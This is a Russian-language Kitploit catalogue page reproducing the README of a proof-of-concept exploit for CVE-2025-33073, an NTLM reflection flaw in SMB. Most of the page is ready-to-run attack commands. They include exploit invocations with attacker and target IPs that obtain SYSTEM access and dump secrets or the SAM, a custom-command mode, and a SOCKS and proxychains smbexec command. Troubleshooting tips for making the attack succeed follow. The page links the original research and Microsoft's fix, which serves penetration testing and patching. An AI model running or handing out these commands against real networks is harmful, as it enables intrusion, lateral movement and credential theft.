Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-33073 — PoC-эксплойт для уязвимости отражения NTLM в SMB. | Kitploit
Инструменты/GitHubGitHub/starscow/cve-2025-33073
Анализ уязвимостейЭксплуатацияЛатеральное перемещениеПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubstarscow/cve-2025-33073

CVE-2025-33073

PoC-эксплойт для уязвимости отражения NTLM в SMB.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-33073

PoC-эксплойт для уязвимости NTLM reflection в SMB.

Все заслуги принадлежат официальному исследованию:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Предварительные требования

ОС: Kali Linux (большинство пакетов уже предустановлено).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (включён в репозиторий)
  • xterm (только для GUI)

Пример использования

GUI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

image

CLI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

image

Пользовательская команда
Вместо запуска secretsdump может быть выполнена пользовательская команда.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

image

SOCKS
Для более скрытного выполнения команд после установления валидного соединения от имени SYSTEM. Здесь --target и --target-ip должны совпадать.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

image Также через proxychains можно выполнить пользовательскую команду вместо дампа SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

Ручная эксплуатация без требования DNS

Если вы находитесь в том же широковещательном домене, что и устройство, и оно уязвимо к отравлению LLMNR, можно эксплуатировать устройство без необходимости регистрировать DNS-запись.

image

Устранение неполадок

  • Я замечал, что атака иногда не срабатывает, потому что для атаки используется имя хоста, что приводит к DNS-запросу из Kali. Если Kali не использует DNS-сервер или вы получаете сообщение '/ FAILED' от impacket-ntlmrelayx, попробуйте добавить хост в файл /etc/hosts. Это должно привести к успешной атаке.
  • При использовании IP-адреса атака должна срабатывать. Иногда многократный запуск приводит к SUCCESS вместо неудачи. До сих пор не совсем ясно, почему это происходит. Думаю, это связано с сетью.
  • Попробуйте другой метод принуждения с помощью -M или --method.

Wireshark

Выполняется локальная NTLM-аутентификация image

Локальная NTLM-аутентификация не выполняется, что приводит к неудачной попытке (FAILED) image

Полезно знать

  • xterm позволяет копировать и вставлять с помощью средней кнопки мыши.
  • DNS-запись также должна быть известна клиенту, в некоторых случаях это может занять больше времени. Под большим временем я имею в виду пару минут.
  • Это всего лишь PoC, что означает, что обходы AV/EDR не тестировались. Используйте на свой страх и риск.

Как исправить

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

Скачать инструмент